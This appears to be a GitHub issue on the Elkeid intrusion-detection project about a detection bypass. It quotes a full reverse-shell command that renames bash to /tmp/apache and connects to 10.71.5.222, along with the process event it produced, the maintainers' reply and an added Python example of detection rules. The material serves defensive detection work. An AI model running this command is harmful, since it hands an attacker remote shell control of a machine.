Please evaluate this rule change:
#4

```shell
cp /bin/bash /tmp/apache;/tmp/apache -i >& /dev/tcp/10.71.5.222/666 0>&1
```

```json
{
  "bootTime": "2022-01-19 18:48:20.000",
  "cmdline": "/tmp/apache -i",
  "cwd": "/",
  "exe": "/tmp/apache",
  "fd_num": "3",
  "name": "apache",
  "pid": "88184",
  "ppid": "50250",
  "r_addr_ip": "10.71.5.222",
  "r_addr_port": "666",
  "session": "50250",
  "stderr": "socket:[583190616]",
  "stdin": "socket:[583190616]",
  "stdout": "socket:[583190616]",
  "terminal": "/pts/0",
  "username": "root"
}
```
Hi, this is a very good issue; bypasses of this kind need to be detected as part of the rule set. In fact that is what we do, and the currently open-sourced rule set is only a small part of our actual commercial version. We suggest you add it yourself, using the binary_file_hijack_detect series in the open-source rules as a reference, to extend detection to file replacements like this one. If you reach a good result, please submit a merge request; we will help test it and merge it in.

Thank you for your interest,
Elkeid Team
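The event in the issue shows why a rule keyed on the executable's name misses this reverse shell, and what does not change when bash is copied to `/tmp/apache`: stdin, stdout and stderr all point at the same socket, and the binary runs from a staging directory. The Python below is an added example, not code from the issue or from Elkeid's own rule set; it runs three candidate detections over the event quoted above plus two constructed comparison events (an un-renamed bash reverse shell and a benign daemon, both made up here). The rule names, the shell-name list and the staging-directory list are assumptions, and `binary_run_from_staging_dir` only follows the spirit of the binary_file_hijack_detect family the maintainers point to, not its actual logic.

```python
import os

# Constructed sample events in the shape of the Elkeid process event quoted in the issue.
# EVENTS[0] is the renamed-bash reverse shell from the issue; EVENTS[1] and EVENTS[2]
# are constructed here for comparison and are not from the page.
EVENTS = [
    {
        "cmdline": "/tmp/apache -i", "exe": "/tmp/apache", "name": "apache",
        "pid": "88184", "ppid": "50250", "cwd": "/", "username": "root",
        "r_addr_ip": "10.71.5.222", "r_addr_port": "666",
        "stdin": "socket:[583190616]", "stdout": "socket:[583190616]",
        "stderr": "socket:[583190616]", "terminal": "/pts/0",
    },
    {   # constructed: the same reverse shell without the rename
        "cmdline": "/bin/bash -i", "exe": "/bin/bash", "name": "bash",
        "pid": "88200", "ppid": "50250", "cwd": "/", "username": "root",
        "r_addr_ip": "10.71.5.222", "r_addr_port": "666",
        "stdin": "socket:[583190700]", "stdout": "socket:[583190700]",
        "stderr": "socket:[583190700]", "terminal": "/pts/0",
    },
    {   # constructed: a benign daemon that has a remote peer but not on its std fds
        "cmdline": "/usr/sbin/sshd -D", "exe": "/usr/sbin/sshd", "name": "sshd",
        "pid": "1201", "ppid": "1", "cwd": "/", "username": "root",
        "r_addr_ip": "10.71.5.10", "r_addr_port": "51022",
        "stdin": "/dev/null", "stdout": "/dev/null", "stderr": "/dev/null",
        "terminal": "",
    },
]

# Assumed lists; tune them for the fleet being monitored.
SHELL_NAMES = {"bash", "sh", "dash", "zsh", "ksh"}
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def name_based_reverse_shell(ev):
    """Assumed shape of a name-keyed rule: a known shell binary with a remote peer.
    Copying bash to /tmp/apache evades exactly this check."""
    return os.path.basename(ev["exe"]) in SHELL_NAMES and bool(ev.get("r_addr_ip"))


def std_fds_on_one_socket(ev):
    """Name-independent rule: stdin, stdout and stderr all redirected to one socket,
    which is what `>& /dev/tcp/... 0>&1` produces whatever the binary is called."""
    fds = [ev.get(k, "") for k in ("stdin", "stdout", "stderr")]
    return all(fd.startswith("socket:[") for fd in fds) and len(set(fds)) == 1


def binary_run_from_staging_dir(ev):
    """Assumed rule in the spirit of the binary_file_hijack_detect family (not the
    project's logic): the executable lives in a world-writable staging directory,
    as a copied binary such as /tmp/apache does."""
    return ev["exe"].startswith(STAGING_DIRS)


RULES = {
    "name_based_reverse_shell": name_based_reverse_shell,
    "std_fds_on_one_socket": std_fds_on_one_socket,
    "binary_run_from_staging_dir": binary_run_from_staging_dir,
}


def evaluate(events):
    """Return {pid: [names of the rules that fired]} for each event."""
    return {ev["pid"]: [n for n, rule in RULES.items() if rule(ev)] for ev in events}


if __name__ == "__main__":
    for pid, hits in evaluate(EVENTS).items():
        print(pid, hits or "no hits")
```

Running it shows the issue's event (pid 88184) passing the name-based rule untouched while both fd-based and staging-directory rules fire on it; the un-renamed shell trips the name-based rule as well, and the benign daemon trips none, since its remote peer is not attached to its standard descriptors.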